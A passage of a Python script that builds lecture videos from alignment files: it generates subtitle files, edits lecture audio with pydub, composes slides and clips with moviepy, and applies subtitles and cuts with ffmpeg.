theSRTVList.append(srt.Subtitle(theIndex,theStart,theStop,\"na\",str(jsonDict)))\n except:\n continue\n\n allMediaSuffixList = imageSuffixList + videoSuffixList + audioSuffixList\n for i in range(len(theSRTVIndexList)):\n theSlide = theSlideList[theSRTVIndexList[i]]\n theFileSuffix = os.path.splitext(theSlide)[1]\n if (theFileSuffix in allMediaSuffixList):\n theSlide = os.path.join(theSlideDir,theSlide)\n theSlide = os.path.relpath(theSlide)\n print(\" %s\" % (theSlide))\n theMeta = str(metaDataList[theSRTVIndexList[i]])\n theStart = float(startDataList[theSRTVIndexList[i]])\n theStop = \"\"\n theMetaList= [x.strip() for x in theMeta.split(';')]\n #print(theFileSuffix)\n if i == len(theSRTVIndexList)-1:\n #this just pads the ends so last slide stays up to the end\n lectureStopTime = float(lectureStopTime)\n theStop = float(lectureStopTime+(outroDuration))\n #print(theStop)\n #sys.exit()\n elif theFileSuffix in videoSuffixList:\n #read in the video clip\n theVideoClip = VideoFileClip(theSlide)\n #start parsing the meta data\n for aMetaArg in theMetaList:\n ###########################\n #split the arg and values\n theMetaArgList = [x.strip() for x in aMetaArg.split(':')]\n theArg = theMetaArgList[0]\n if len(theMetaArgList)>1: theValue = theMetaArgList[1]\n ###########################\n if theArg == \"loop\":\n #default the looping to stop when the next slide starts\n theStop = float(startDataList[theSRTVIndexList[i+1]])\n if theArg == \"duration\":\n #if an explicit duration is provided, use that\n theStop = float(theStart+float(theValue))\n elif theStop == \"\":\n #if no duration is provided, and if it's not looped, the duration should be the video length\n theDuration = theVideoClip.duration #in seconds\n theStop = float(theStart+theDuration)\n #startDataList[theSRTVIndexList[i+1]]=theStop\n elif theFileSuffix in audioSuffixList:\n #this section is for audio replace\n theStop = float(stopDataList[theSRTVIndexList[i]])\n elif theFileSuffix == \"\" or (os.path.exists(os.path.join(theSlideDir,theSlideList[theSRTVIndexList[i]])) == False):\n #this section is for text overlays\n #need to have it written to a unique srt file\n #lectureStartTime = datetime.timedelta(seconds=lectureStartTime) #convert to datetime\n theStart = float(startDataList[theSRTVIndexList[i]])-float(lectureStartTime)\n theStop = float(stopDataList[theSRTVIndexList[i]])-float(lectureStartTime)\n #convert theMeta to a list\n #theMetaList =theMeta.split(';')\n for aMetaArg in theMetaList:\n ###########################\n #split the arg and values\n theMetaArgList = [x.strip() for x in aMetaArg.split(':')]\n theArg = theMetaArgList[0]\n if len(theMetaArgList)>1: theValue = theMetaArgList[1]\n ###########################\n # for j in theMetaList:\n # theSublist = j.split(\":\")\n #if there is a defined duration, use that as theStop\n if theArg == \"duration\":\n theTextDuration = float(theValue)\n theStop = (float(startDataList[theSRTVIndexList[i]])+theTextDuration)-float(lectureStartTime)\n #print(theStart)\n #print(theStop)\n print(\" %s --> %s\\n\" %(datetime.timedelta(seconds=theStart+float(lectureStartTime)), datetime.timedelta(seconds=theStop+float(lectureStartTime))))\n if theMeta == \"nan\": theMeta = \"\"\n theStart = datetime.timedelta(seconds=theStart+theSlateDuration) #convert to datetime\n theStop = datetime.timedelta(seconds=theStop+theSlateDuration) #convert to datetime\n theSRTList.append(srt.Subtitle(i,theStart,theStop,theSlide,theMeta))\n continue #move to the next item in theSRTVIndexList\n else:\n #this is sort of complicated\n #a slide image should end when the next slide OR video starts\n #it should not end when an audio clip begins\n #it should not end when a text overlay beings\n #so if the following entries are an audio clip OR a text overlay, ignore it\n ####NEW\n #start parsing the meta data\n for aMetaArg in theMetaList:\n ###########################\n #split the arg and values\n theMetaArgList = [x.strip() for x in aMetaArg.split(':')]\n theArg = theMetaArgList[0]\n if len(theMetaArgList)>1: theValue = theMetaArgList[1]\n ###########################\n if theArg == \"duration\":\n #if an explicit duration is provided, use that\n theStop = float(theStart+float(theValue))\n ############\n if theStop==\"\":\n while (os.path.splitext(theSlideList[theSRTVIndexList[i+1]])[1] in audioSuffixList) or (\n os.path.exists(os.path.relpath(os.path.join(theSlideDir,theSlideList[theSRTVIndexList[i+1]]))) == False):\n #print(theSlideDir)\n #print(theSlideList[theSRTVIndexList[i+1]])\n #print(os.path.relpath(os.path.join(theSlideDir,theSlideList[theSRTVIndexList[i+1]])))\n #print(os.path.isfile(os.path.relpath(os.path.join(theSlideDir,theSlideList[theSRTVIndexList[i+1]]))))\n i=i+1\n print(\" ERROR: Slide may not exist\")\n theStop = float(startDataList[theSRTVIndexList[i+1]])\n #print(theStop)\n #print(datetime.timedelta(seconds=theStop))\n #print(i)\n theStart = datetime.timedelta(seconds=theStart) #convert to datetime\n theStop = datetime.timedelta(seconds=theStop) #convert to datetime\n print(\" %s --> %s\\n\" %(theStart, theStop))\n\n if theMeta == \"nan\": theMeta = \"\"\n theIndex = len(theSRTVList)+1\n theSRTVList.append(srt.Subtitle(theIndex,theStart,theStop,theSlide,theMeta))\n\n ###save an actual srt file\n if theSRTList != []:\n theFileName = theLectureName+\".srt\"\n theFileName = os.path.join(theSRTDir, theFileName)\n with open(theFileName, \"w\") as theFile:\n theFile.write(srt.compose(theSRTList))\n print(\" SRT file generated\\n\")\n\n ###save the data as a modified version of a srt file\n theFileName = theLectureName+\".srtv\"\n theFileName = os.path.join(theSRTVDir, theFileName)\n with open(theFileName, \"w\") as theFile:\n theFile.write(srt.compose(theSRTVList))\n print(\" Hacky SRT-video file generated\\n\")\n #need to reindex subtitles based on start time\n #there must be a better way, but this should work\n theSRTVList = srt.compose(theSRTVList)\n theSRTVList = list(srt.parse(theSRTVList))\n return theSRTVList\n ##########################################################################################\n\n\ndef processAudio(theSRTVList, theAudioDir, theLectureName, lectureStartTime, lectureStopTime):\n audioFilePath = os.path.join(theAudioDir, theLectureName+\".mp3\")\n theLectureAudio = \"\" #just a place holder that gives a logic check later\n theAudioClip = \"\" #just a place holder that gives a logic check later\n madeAnAudioEdit = False\n\n #I should have made things a form of json form the start\n # :( STH 2020-0805\n #for anEntry in theSRTVList:\n for i in theSRTVList: \n thePosition = ((i.start).total_seconds())*1000.0 #convert to millisec \n theMetaList = [x.strip() for x in i.proprietary.split(';')]\n theGain = 0 #no ducking\n #theSlide = anEntry.content\n theContent= i.content\n theFileSuffix = os.path.splitext(theContent)[1]\n if theFileSuffix in audioSuffixList:\n #################################\n #only load the lecture audio once\n if theLectureAudio == \"\": \n print(\" Loading lecture audio file %s\" % audioFilePath)\n theLectureAudio = AudioSegment.from_file(audioFilePath) \n #################################\n #only load the clip audio once\n #if theAudioClip == \"\": \n print(\" Loading audio clip %s\" % theContent)\n theAudioClip = AudioSegment.from_file(theContent)\n ################################# \n theDuration = theAudioClip.duration_seconds\n \n for aMetaArg in theMetaList:\n ###########################\n #split the arg and values\n theMetaArgList = [x.strip() for x in aMetaArg.split(':')]\n theArg = theMetaArgList[0]\n theValue=\"\"\n #print(theArg)\n if len(theMetaArgList)>1: theValue = theMetaArgList[1]\n ###########################\n if theArg == \"duration\":\n theNewDuration = float(theValue) #this assumes the duration is less than the clip length. \n #print(\" Setting clip duration to %s\" % (theDuration))\n #theAudioClip = theAudioClip[:theDuration*1000]\n #################################\n #experiment with altering the duration of sound clips\n #2021-0513 STH\n theAudioClipArray = np.array(theAudioClip.get_array_of_samples())\n\n sampleRate = theAudioClip.frame_rate\n tempoRatio=theDuration/theNewDuration\n #print(tempoRatio)\n if theNewDuration!=theDuration:\n print(\" Adjusting duration of clip to be %s seconds\" % theNewDuration)\n\n theAudioClipArray_fast = pyrb.time_stretch(theAudioClipArray, sampleRate, tempoRatio)\n theAudioClipArray = np.int16(theAudioClipArray_fast * 2 ** 15)\n\n channels = 2 if (theAudioClipArray_fast.ndim == 2 and theAudioClipArray_fast.shape[1] == 2) else 1\n \n theAudioClip = AudioSegment(theAudioClipArray.tobytes(), frame_rate=sampleRate, sample_width=2, channels=channels)\n #sys.exit()\n ###########################\n if theArg == \"replace\":\n print(\" Replacing audio at time %s seconds\" % (thePosition/1000))\n print(\" Ducking audio file\")\n theGain = -100 #duck the audio if the meta data says replace\n ###########################\n if theArg == \"overlay\":\n print(\" Overlaying clip onto main audio\")\n\n ################\n print(\" Combining audio...\")\n theLectureAudio = theLectureAudio.overlay(theAudioClip, position=(thePosition), gain_during_overlay=theGain)\n madeAnAudioEdit = True\n\n\n ##########################################################################################\n #audio ducking, especially for use with video insertion\n for aMetaArg in theMetaList:\n ###########################\n #split the arg and values\n theMetaArgList = [x.strip() for x in aMetaArg.split(':')]\n theArg = theMetaArgList[0]\n theValue = \"\"\n if len(theMetaArgList)>1: theValue = theMetaArgList[1]\n ###########################\n if theArg == \"lecture\":\n ###This allows for multiple sub metas after the :\n theSubValue = [x.strip() for x in theValue.split(',')]\n if theSubValue[0] == \"mute\":\n thePosition = ((i.start).total_seconds())*1000.0 #convert to millisec\n theStop = ((i.end).total_seconds())*1000.0 #convert to millisec\n theDuration = theStop-thePosition\n if len(theSubValue)>1:\n #theStop = float(theSubValue[1])*1000.0 #convert to millisec\n #theDuration = theStop-thePosition\n theDuration = float(theSubValue[1])*1000.0 #convert to millisec\n\n #duck the lecture if indicated\n if madeAnAudioEdit == False: print(\" Audio edits detected...\")\n if theLectureAudio == \"\": \n print(\" Loading audio file %s\" % audioFilePath)\n theLectureAudio = AudioSegment.from_file(audioFilePath)\n theGain = -100 #duck the audio if the meta data says to mute the lecture audio\n \n print(\" Ducking audio at time %s seconds\" % (thePosition/1000))\n print(\" Duration will be %s seconds\" % (theDuration/1000))\n #make a silent audio clip\n theSilence= AudioSegment.silent(duration=theDuration)\n theLectureAudio = theLectureAudio.overlay(theSilence, position=(thePosition), gain_during_overlay=theGain)\n #the following might be a saner way to do this:\n #theLectureAudio = theLectureAudio.fade(to_gain=theGain, start=thePosition, end=theStop)\n madeAnAudioEdit = True\n ##########################################################################################\n\n\n # ##########################################################################################\n # #insert pad (silent) audio if needed\n # #will probably need to provide a way to insert into existing audio\n # #but for simplicity right now, just assume that pad gets put at the start\n # #STH 2020-0621\n # if 'lecture:insert' in theMetaList:\n # if madeAnAudioEdit == False: print(\" 507 Audio edits detected...\")\n # if theLectureAudio == \"\": \n # print(\" Loading audio file %s\" % audioFilePath)\n # theLectureAudio = AudioSegment.from_file(audioFilePath)\n # theDuration = 5.0 #just give it a default\n # for j in theMetaList:\n # theSublist = [x.strip() for x in j.split(':')]\n # if theSublist[0].strip() == \"duration\":\n # theDuration = float(theSublist[1]) #if there is a defined duration, use that \n # print(\" Inserting pad silence at start. %s seconds\" % (theDuration))\n # theLectureAudio = AudioSegment.silent(duration=theDuration*1000)+theLectureAudio #x1000 to convert sec to millisec\n # ##########################################################################################\n # #This section does things like insert the correct word if you screwed up in lecture\n # #The cannonical example is saying \"latitude\" when you(I) mean \"longitude\"\n # if theFileSuffix in audioSuffixList:\n # if madeAnAudioEdit == False: print(\" 523 Audio edits detected...\")\n # #################################\n # #only load the lecture audio once\n # if theLectureAudio == \"\": \n # print(\" Loading audio file %s\" % audioFilePath)\n # theLectureAudio = AudioSegment.from_file(audioFilePath) \n # #################################\n # #################################\n # #only load the clip audio once\n # if theAudioClip == \"\": \n # print(\" Loading audio clip %s\" % theSlide)\n # theAudioClip = AudioSegment.from_file(theSlide) \n # #################################\n # print(\"!!!!!!!\")\n # print(theArg)\n # #thePosition = ((anEntry.start).total_seconds()+allPadDuration)*1000.0 #convert to millisec\n # thePosition = ((anEntry.start).total_seconds())*1000.0 #convert to millisec\n # #theStop = ((anEntry.end).total_seconds())*1000.0 #convert to millisec\n # if theArg == 'replace':\n # #theAudioClip = AudioSegment.from_file(audioFilePath)\n # print(\" Ducking audio file\")\n # theGain = -100 #duck the audio if the meta data says replace\n # print(\" Replacing audio at time %s seconds\" % (thePosition/1000))\n # if theArg == 'duration':\n # print(\"do duration stuff\")\n # ################\n # #experiment in duration\n # print(\"trimming clip to 10 seconds\")\n # print(theAudioClip.duration_seconds)\n # theAudioClip = theAudioClip[:10000]\n # ################\n # theLectureAudio = theLectureAudio.overlay(theAudioClip, position=(thePosition), gain_during_overlay=theGain)\n # madeAnAudioEdit = True\n\n\n ##########################################################################################\n #trim the audio to fit lectureStartTime & lectureStopTime\n #multiply lectureStartTime & lectureStopTime by 1000 because pydup does things in milliseconds\n #This is important: this trim action is done at the end because the srtv file records the timing\n #of all events from start of audio, not from start point. \n #if you duck audio, the time is from start of audio, not from designated start\n #if you trim first the time of the duck is thrown off.\n #This can be fixed \n theLastTimePoint = theSRTVList[-1].end\n if (lectureStartTime != 0.0) or (lectureStopTime != theLastTimePoint):\n if madeAnAudioEdit == False: print(\" Audio edits detected...\")\n if theLectureAudio == \"\": \n print(\" Loading audio file %s\" % audioFilePath)\n theLectureAudio = AudioSegment.from_file(audioFilePath)\n print(\" Editing audio length\")\n lectureStopTime = float(lectureStopTime)\n #############\n #weird bug where _sometimes_ the start time is seen as a string\n # print(type(lectureStartTime)) \n # print(type(lectureStopTime))\n lectureStartTime = float(lectureStartTime)\n #############\n theLectureAudio = theLectureAudio[int(lectureStartTime*1000.0):int(lectureStopTime*1000.0)]\n madeAnAudioEdit = True\n\n ##########################################################################################\n if madeAnAudioEdit==True:\n print(\" Saving edited audio as a new copy...\")\n (thePath, theName) = os.path.split(audioFilePath)\n theName=\"EDITED - \"+theName\n audioFilePath = os.path.join(thePath,theName)\n theLectureAudio.export(audioFilePath, format=\"mp3\")\n return audioFilePath\n\n\n\ndef makeVideoFromSRTVList(theSRTVList, theSlideDir, audioFilePath, theLectureName, theCandidateVideoDir):\n theSlideList = []\n theCompositList = []\n theTextClipList = []\n cutList = []\n #####insert the slate at the start\n theSlideDir = os.path.join(theSlideDir,theLectureName)\n theSlate = os.path.join(theSlideDir,\"Slide0.png\")\n theCandidateVideoPath = os.path.join(theCandidateVideoDir,theLectureName+\".mp4\")\n if os.path.exists(theSlate):\n theSlateSize = Image.open(theSlate).size #This will be used to resize videos later\n\n ################################################################################\n #load in the lecture audio file\n #need to load this in first in case you need to duck lecture audio \n print(\" Loading audio file %s\" % audioFilePath)\n theLectureAudio = AudioSegment.from_file(audioFilePath)\n theAudioFrameRate = theLectureAudio.frame_rate #needed later to convert numpy array\n\n ################################################################################\n ###There can be a situation where there are no slides immediately after the slate\n ###This inserts a black filler slide\n ###Do this once to make a leader if needed\n if ((theSRTVList[0].start).total_seconds() != 0.0) and (\"start\" not in theSRTVList[0].proprietary):\n #theDuration = theSRTVList[0].start.total_seconds()-theSlateDuration #subtract out the duration of the start slate\n theDuration = theSRTVList[0].start.total_seconds() #no need to subtract the slate duration if slate gets inserted at the end of the process\n theSlideList.append(ImageClip(theLeaderImage).set_duration(theDuration))\n\n for i in theSRTVList:\n overlayClip = False\n\n theMetaList = [x.strip() for x in i.proprietary.split(';')]\n if \"start\" in theMetaList:\n theStartOffset = (i.start).total_seconds()\n if \"stop\" in theMetaList:break\n\n theContent= i.content\n theDuration = (i.end-i.start).total_seconds()\n theFileSuffix = os.path.splitext(theContent)[1]\n if theFileSuffix in videoSuffixList:\n print(\" Generating video clip...\")\n theVideoClip = VideoFileClip(theContent)\n\n # resize (keep aspect ratio)\n #theVideoClip = theVideoClip.fx(vfx.resize, width=theSlateSize[0]*0.8)\n if theVideoClip.w>theSlateSize[0]:\n print(\" Video is too wide. Resizing...\")\n theVideoClip = theVideoClip.fx(vfx.resize, width=theSlateSize[0])\n if theVideoClip.h>theSlateSize[1]:\n print(\" Video is too high. Resizing...\")\n #theVideoClip = theVideoClip.fx(vfx.resize, height=theSlateSize[1]*0.8)\n theVideoClip = theVideoClip.fx(vfx.resize, height=theSlateSize[1])\n for aMetaArg in theMetaList:\n ###########################\n #split the arg and values\n theMetaArgList = [x.strip() for x in aMetaArg.split(':')]\n theArg = theMetaArgList[0]\n if len(theMetaArgList)>1: theValue = theMetaArgList[1]\n ###########################\n # print(\" Generating video clip...\")\n # theVideoClip = VideoFileClip(theContent)\n\n # # resize (keep aspect ratio)\n # #theVideoClip = theVideoClip.fx(vfx.resize, width=theSlateSize[0]*0.8)\n # if theVideoClip.w>theSlateSize[0]:\n # print(\" Video is too wide. Resizing...\")\n # theVideoClip = theVideoClip.fx(vfx.resize, width=theSlateSize[0])\n # if theVideoClip.h>theSlateSize[1]:\n # print(\" Video is too high. Resizing...\")\n # #theVideoClip = theVideoClip.fx(vfx.resize, height=theSlateSize[1]*0.8)\n # theVideoClip = theVideoClip.fx(vfx.resize, height=theSlateSize[1])\n\n ###########################\n if theArg == \"overlay\" in theMetaList:\n #default location placement should be slide center\n #This should probably be abstracted out to a function. \n #it's going to be used in multiple locations probably\n SWC = int(theSlateSize[0]/2) #SlideWidthCenter (SWC)\n SHC = int(theSlateSize[1]/2) #SlideHeightCenter (SHC)\n CWC = int(theVideoClip.w/2) #ClipWidthCenter (CWC)\n CHC = int(theVideoClip.h/2) #ClipHeightCenter (CHC)\n #theVideoClip=theVideoClip.set_position((SWC-CWC, SHC-CHC))\n theVideoClip=theVideoClip.set_position((SWC-CWC, SHC-CHC))\n overlayClip = True\n if theArg == \"video\":\n if theValue == \"mute\": \n #theVideoClip = VideoFileClip(theContent, audio=False)\n theVideoClip = theVideoClip.without_audio()\n #else:\n #theVideoClip = VideoFileClip(theContent, audio=True)\n if theArg == \"loop\":\n theVideoClip = theVideoClip.fx(vfx.loop, duration=theDuration)\n if theArg == \"duration\":\n theDuration = float(theValue)\n if theDuration > theVideoClip.duration:\n #the specified duration is longer than the video. Loop it\n theVideoClip = theVideoClip.fx(vfx.loop, duration=theDuration)\n if theDuration < theVideoClip.duration:\n #the specified duration is less than the video. Trim it\n theVideoClip = theVideoClip.set_end(theDuration)\n if theArg == \"resize\":\n theParams = [x.strip() for x in theValue.split(',')]\n holdTime = float(theParams[0])\n theSizeRatio = float(theParams[1])\n ###\n theStartSizeW = theVideoClip.w\n theEndSizeW = theStartSizeW*theSizeRatio\n theEndSizeW = theSizeRatio\n orgX = theVideoClip.pos(0)[0]\n orgY = theVideoClip.pos(0)[1]\n ###\n theVideoClip = theVideoClip.resize(lambda t : (resize(t,holdTime,theStartSizeW,theEndSizeW)))\n #after you resize, make sure th xy location remains the same\n #theVideoClip = theVideoClip.set_position((orgX,orgY))\n if theArg == \"move\":\n theMoveParams = [x.strip() for x in theValue.split(',')]\n holdTime = theMoveParams[0]\n endX = theMoveParams[1]\n endY = theMoveParams[2]\n ###\n startX = theVideoClip.pos(0)[0] #what is the X position of the clip at time 0\n startY = theVideoClip.pos(0)[1] #what is the Y position of the clip at time 0\n theClipSize = theVideoClip.size\n theVideoClip = theVideoClip.set_position(lambda t:(move(t,holdTime,startX,endX,startY,endY,theSlateSize,theClipSize)))\n if theArg == \"animove\":\n #does not work great\n #STH 2020-0803\n theMoveParams = [x.strip() for x in theValue.split(',')]\n holdTime = theMoveParams[0]\n endX = theMoveParams[1]\n endY = theMoveParams[2]\n startX = theVideoClip.pos(0)[0] #what is the X position of the clip at time 0\n startY = theVideoClip.pos(0)[1] #what is the Y position of the clip at time 0\n theClipSize = theVideoClip.size\n theVideoClip = theVideoClip.set_position(lambda t:(calcPos(t,holdTime,startX,endX,startY,endY,theSlateSize,theClipSize)))\n if theArg == \"aniresize\":\n #does not work great\n #STH 2020-0803\n #this needs to be fixed to make it more like move(allowing for hold time)\n theSize = float(theValue)\n theVideoClip = theVideoClip.resize(lambda t : 1-0.02*t)\n\n ###########################\n\n\n if overlayClip == True:\n theVideoClip=theVideoClip.set_start(i.start.total_seconds()-theStartOffset+theSlateDuration)\n # #default location placement should be slide center\n # #This should probably be abstracted out to a function. \n # #it's going to be used in multiple locations probably\n # SWC = int(theSlateSize[0]/2) #SlideWidthCenter (SWC)\n # SHC = int(theSlateSize[1]/2) #SlideHeightCenter (SHC)\n # CWC = int(theVideoClip.w/2) #ClipWidthCenter (CWC)\n # CHC = int(theVideoClip.h/2) #ClipHeightCenter (CHC)\n # #theVideoClip=theVideoClip.set_position((SWC-CWC, SHC-CHC))\n # theVideoClip=theVideoClip.set_position((SWC-CWC, SHC-CHC))\n theCompositList.append(theVideoClip)\n else:\n theSlideList.append(theVideoClip)\n ########################################################\n elif theFileSuffix in audioSuffixList:\n print(\" Generating audio clip...\")\n if \"replace\" in theMetaList:\n bla=1\n elif theFileSuffix in imageSuffixList:\n print(\" Generating image clip...\")\n aSlide = ImageClip(theContent).set_duration(theDuration)\n ################################################\n ###Experimenting with audio over the start slate\n ###STH 2021-1010\n ###See also code @ ~895\n # if i.index==1:\n # print(\" Clip is start slide. Shortening for slate\")\n # aSlide = ImageClip(theContent).set_duration(theDuration-theSlateDuration)\n # else:\n # aSlide = ImageClip(theContent).set_duration(theDuration)\n ###Turned off because it was messing up subtitles\n ###STH 2021-1201\n ################################################\n if aSlide.w>theSlateSize[0]:\n print(\" Image is too wide. Resizing...\")\n #aSlide = aSlide.fx(vfx.resize, width=theSlateSize[0]*0.9)\n aSlide = aSlide.fx(vfx.resize, width=theSlateSize[0])\n if aSlide.h>theSlateSize[1]:\n print(\" Image is too high. Resizing...\")\n #aSlide = aSlide.fx(vfx.resize, width=theSlateSize[1]*0.9)\n aSlide = aSlide.fx(vfx.resize, height=theSlateSize[1])\n theSlideList.append(aSlide)\n else:\n print(\" Not video, image, or audio...\")\n for aMetaArg in theMetaList:\n #print(\"************************\")\n #print(\"the start offset is %s\" % theStartOffset)\n try:\n aMetaArg = aMetaArg.replace(\"'\", '\"')\n jsonDict = json.loads(aMetaArg)\n if 'cut' in jsonDict.keys():\n if 'duration' in jsonDict['cut'].keys():\n #cutting is done after removing any unwanted lead in\n #and after adding the slate\n #so remove the startOffset and add the slate duration\n theStart = (i.start).total_seconds() - theStartOffset\n #theStart = (i.start).total_seconds()-theSlateDuration\n #theStop = (i.end).total_seconds()\n #theStop = (i.end).total_seconds()-theSlateDuration\n theStop = (i.end).total_seconds() + theSlateDuration - theStartOffset\n cutList.append([theStart,theStop])\n #print(cutList)\n except:\n continue\n\n\n ################################################################################ \n #insert the slate at the start\n theSlateClip = ImageClip(theSlate).set_duration(theSlateDuration)\n theSlideList.insert(0,theSlateClip)\n\n ################################################################################\n #with length editing, the slate should be inserted right at the end, after subclip is made\n print(\" Concatenating image and video clips...\")\n catedVideo = concatenate_videoclips(theSlideList, method=\"compose\")\n #Set the size back to slate size\n #there is a bug related to clip resizing I have not tracked down yet\n #STH 0802-2020\n catedVideo = catedVideo.fx(vfx.resize, width=theSlateSize[0])\n #catedVideo = catedVideo.fx(vfx.resize, (theSlateSize[0],theSlateSize[1]))\n \n ###Turned off as part of text-over-start slate changes ~line 835\n ################################################################################\n #insert the initial silence for the opening slate\n if theSlateDuration > 0:\n print(\" Adding slate intro buffer...\")\n theLectureAudio = AudioSegment.silent(duration=theSlateDuration*1000)+theLectureAudio #x1000 to convert sec to millisec\n\n ################################################################################\n #convert the pydub audio into something moviepy can use\n theLectureAudio = pydub_to_moviepy(theLectureAudio, theAudioFrameRate)\n ################################################################################\n\n\n #composit the video audio with the lecture audio\n #print(\" Combining video and lecture audio...\")\n #print(vars(video.audio))\n #print(vars(theLectureAudio))\n ################################################################################\n if catedVideo.audio != None:\n theMoviePyAudio = catedVideo.audio\n theCompositeAudio = CompositeAudioClip([theMoviePyAudio, theLectureAudio])\n else:\n theCompositeAudio = theLectureAudio\n\n ################################################################################\n finalVideo = catedVideo.set_audio(theCompositeAudio)\n\n if theCompositList!=[]:\n #use wisely\n #doing this is a slow process.\n #theCompositList.append(finalVideo)\n theCompositList.insert(0,finalVideo)\n #finalVideo = CompositeVideoClip([finalVideo,theCompositList[0].set_start(2)])\n finalVideo = CompositeVideoClip(theCompositList)\n\n ################################################################################\n finalVideo.write_videofile(theCandidateVideoPath, fps=12, audio=True, write_logfile=False, threads=4)\n print(cutList)\n return cutList\n\n else:\n ###should be moved up with other initial checks\n theFeedback=\" Path '%s' found: %s\"\n print(theFeedback % (theSlate, \"FALSE\"))\n print(\" Exiting.\")\n sys.exit()\n\n\nif __name__ == '__main__':\n timerStartTime = datetime.datetime.now()\n\n parser = argparse.ArgumentParser(description='Who wants some popcorn?')\n parser.add_argument('--mksrt', metavar='', dest='mksrt', default=True, required=False, help='make srt & srvt files? Default True' )\n parser.add_argument('--editaudio', metavar='', dest='editaudio', default=True, required=False, help='make edits to audio according to alignment file? Default True' )\n parser.add_argument('--mkvideo', metavar='', dest='mkvideo', default=True, required=False, help='generate the final video? Default True' )\n parser.add_argument('--addsrt', metavar='', dest='addsrt', default=True, required=False, help='add text overlays from srt(if exists)? Default True' )\n\n parser.add_argument('--alignmentDir', metavar='', dest='theAlignmentDir', default='intermediate/lecture_alignments', required=False, help='path to alignment file directory')\n parser.add_argument('--srtvDir', metavar='', dest='theSRTVDir', default='intermediate/lecture_srtv', required=False, help='path to SRTV file directory')\n parser.add_argument('--srtDir', metavar='', dest='theSRTDir', default='intermediate/lecture_srt', required=False, help='path to SRT file directory')\n parser.add_argument('--audioDir', metavar='', dest='theAudioDir', default='intermediate/processed_audio/transcribed', required=False, help='path to folder containing processed mp3s' )\n parser.add_argument('--slideDir', metavar='', dest='theSlideDir', default='intermediate/lecture_slides', required=False, help='general path to slide images')\n parser.add_argument('--videoOut', metavar='', dest='theCandidateVideoDir', default='output/candidate_video', required=False, help='path to the folder videos will be written to')\n args = parser.parse_args()\n print(args)\n\n #check and see if boolean things are boolean\n if isinstance(args.mksrt, str):\n args.mksrt = booleanCheck(args.mksrt)\n if isinstance(args.editaudio, str):\n args.editaudio = booleanCheck(args.editaudio)\n if isinstance(args.mkvideo, str):\n args.mkvideo = booleanCheck(args.mkvideo)\n if isinstance(args.addsrt, str):\n args.addsrt = booleanCheck(args.addsrt)\n\n theSlideDir = fileUtils.pathExistsMake(args.theSlideDir)\n theAlignmentDir = fileUtils.pathExistsMake(args.theAlignmentDir)\n theAudioDir = fileUtils.pathExistsMake(args.theAudioDir)\n theSRTDir = fileUtils.pathExistsMake(args.theSRTDir, True)\n theSRTVDir = fileUtils.pathExistsMake(args.theSRTVDir, True)\n theCandidateVideoDir = fileUtils.pathExistsMake(args.theCandidateVideoDir, True)\n theLeaderImage = fileUtils.pathExistsMake(theLeaderImage)\n\n ###Start reading in alignment files from the alignment directory\n tempVar = os.path.join(theAlignmentDir, \"*.csv\")\n for theFileName in glob.glob(tempVar):\n theLectureName = os.path.basename(theFileName)\n print(\" File found. Opening '%s'\" % theLectureName)\n theLectureName = os.path.splitext(theLectureName)[0]\n theAlignmentFile = pd.read_csv(theFileName, header=None, names=['word','start','stop','token','slide','meta'], usecols=[1,2,3,4,5,6], encoding = \"ISO-8859-1\")\n startDataList = list(theAlignmentFile['start'])\n stopDataList = list(theAlignmentFile['stop'])\n theSlideList = list(theAlignmentFile['slide'])\n metaDataList = list(theAlignmentFile['meta'])\n\n ###Read the alignment file and try to get lecture start/stop data\n lectureStartTime, lectureStopTime = readStartStopTimes(theAlignmentFile, metaDataList)\n\n theSRTVIndexList=indexListMatchingElement(theSlideList, \"nan\")\n\n theSRTVList = []\n if args.mksrt == True:\n if theSRTVIndexList:\n theSRTVList = makeSRTVFile(theLectureName, theSRTVIndexList, theSlideList, theSlideDir, metaDataList, startDataList, stopDataList, lectureStartTime, lectureStopTime, theSRTVDir, theSRTDir)\n else:\n print(\" No slide info found. Skipping.\\n\")\n elif (args.editaudio == True) or (args.mkvideo == True):\n #need the srtv file for processing audio and/or making the video\n theFileName = theLectureName+\".srtv\"\n theFileName = os.path.join(theSRTVDir, theFileName)\n theFileName = fileUtils.pathExistsMake(theFileName)\n print(\" Opening '%s'\" % (theLectureName+\".srtv\"))\n with open(theFileName) as theFile:\n theFileData = theFile.read()\n theFile.close()\n print(\" Parsing '%s'\" % (theLectureName+\".srtv\"))\n theSRTVList=srt.parse(theFileData)\n \n\n #next will be to use the list returned from makeSRTVFile() to process it and make necessary changes to the audio file\n #should also be an option to read in file eventually\n if args.editaudio == True:\n if fileUtils.pathExists(os.path.join(theAudioDir,theLectureName+\".mp3\")):\n audioFilePath = processAudio(theSRTVList, theAudioDir, theLectureName, lectureStartTime, lectureStopTime)\n\n elif args.mkvideo == True:\n #need the audio to make the video\n theFileName = \"EDITED - \"+theLectureName+\".mp3\"\n audioFilePath = os.path.join(theAudioDir, theFileName)\n audioFilePath = pathExistsMake(audioFilePath)\n print(\" Found '%s'\" % (theFileName))\n if args.mkvideo == True:\n if theSRTVList:\n cutList = makeVideoFromSRTVList(theSRTVList, theSlideDir, audioFilePath, theLectureName, theCandidateVideoDir)\n\n if args.addsrt ==True:\n theSRTFileName = theLectureName+\".srt\"\n theSRTFileName = os.path.join(theSRTDir, theSRTFileName)\n theSRTFileName = pathExistsMake(theSRTFileName)\n print(\" Found '%s'\" % (theLectureName+\".srt\"))\n theVideoFileName = theLectureName+\".mp4\"\n theVideoFileName = os.path.join(theCandidateVideoDir, theVideoFileName)\n theVideoFileName = pathExistsMake(theVideoFileName)\n print(\" Found '%s'\" % (theLectureName+\".mp4\"))\n\n theCandidateVideoPath = os.path.join(theCandidateVideoDir,theLectureName+\"-b.mp4\")\n\n stream = ffmpeg.input(theVideoFileName)\n stream = ffmpeg.output(stream, theCandidateVideoPath, **{'vf': \"subtitles=\"+theSRTFileName+\":force_style='Fontname=Impact'\"}, **{'c:a': 'copy'}).overwrite_output()\n #print(ffmpeg.compile(stream))\n ffmpeg.run(stream)\n theVideoFileName = theCandidateVideoPath\n print(\"**********\")\n print(cutList)\n if cutList !=[]: \n print(\" Attempting to make cuts to video...\")\n stream = ffmpeg.input(theVideoFileName)\n theConcatList = []\n ###############\n cutList = list(itertools.chain.from_iterable(cutList)) #flaten the cutlist\n cutList = [0.0] + cutList #append 0.0 to the beginning\n cutList = cutList + ['end'] #throw 'end' at the end\n cutList = list(zip(itertools.islice(cutList,None,None,2), itertools.islice(cutList,1,None,2))) #break the flat cutlist into diads\n for cutItem in cutList:\n startTime = 